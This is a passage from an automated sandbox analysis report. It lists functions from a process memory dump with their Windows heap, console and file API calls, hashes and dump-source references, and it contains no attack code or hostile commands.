                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3512109576-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f4b1d5ce50235cd8df95cbb63a3d342c9287a43de6d3e78912ffcd14c768081
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E216B62A09A8B86FB05EB65D4142BCBBA0FB59B44FD48036CA4F47271DEBCA445C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B701
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B715
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1975c8fa02f60c8097d6d8fc63ad62c8c6dc35d6443467d08fd32a81c75e7103
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10210E22A0964B86FF55AB11E45007CF6A1FB48B80BD99472DA4F03770DFBCE585C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D01C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D033
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D06D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7D152507A), ref: 00007FF7D153D07F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1033415088-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b08333328f99d9615a50a6a119c721ff0de41afcacc866bd43b99fdc50f2633b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3117C31618A4686EB449B20B0041BEF7A0FB8AB95FC05136EA8F47B64EF7CC0458B50
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15159E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1521EA0: wcschr.MSVCRT(?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7D1540D54), ref: 00007FF7D1521EB3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1515A2E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _open_osfhandle.MSVCRT ref: 00007FF7D1515A4F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15337AA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7D15337D2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 22757656-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6a4973e78819d1125b8d4f115324b875c79d888c608fbcb2cd1d238aaef6e5e7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08115E72A1464A8BF7506B24E44837DBAA0EB8AB64FE44335D62F473E4CF7CD5498B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1535690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356C5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15356D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356FD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1535711
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c1415feac54fe10fd994105a17aa43aff1488df15177523c56e77a3d61d14315
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E112872A04B99C6EB009F56E4040ACBBA0F749F84B998136DB8E03728DF38E556C750
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1529158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2f4131741d9d6632e511b7eb769d28a46f522d1e99eacb17b21fa6a77158af08
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D219236A18B4AC5F740AB05E884369B3A4FB95754FE00036EA8E42774DFBDE444C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D152EE64
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D152EE78
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: aeafd825acc0c2459856bf1129d0d12cf226c095d70a8de63a7ba88b8fc572ff
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CF03721A09A4B8AFF44AB66940417CE9D1EF8EB41BD88075C94F82361EE7CA5448220
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8beab73fc294975fae0c87a6bf992513190122a583313315714312053ba7887e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26F01C35A24A56CBE7446B11E8441BDFA60FF8AB02FD49275DA0B023B4DF7CD0088B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151EF40: wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F031
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F0D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT ref: 00007FF7D152CCBC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D152CCE0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
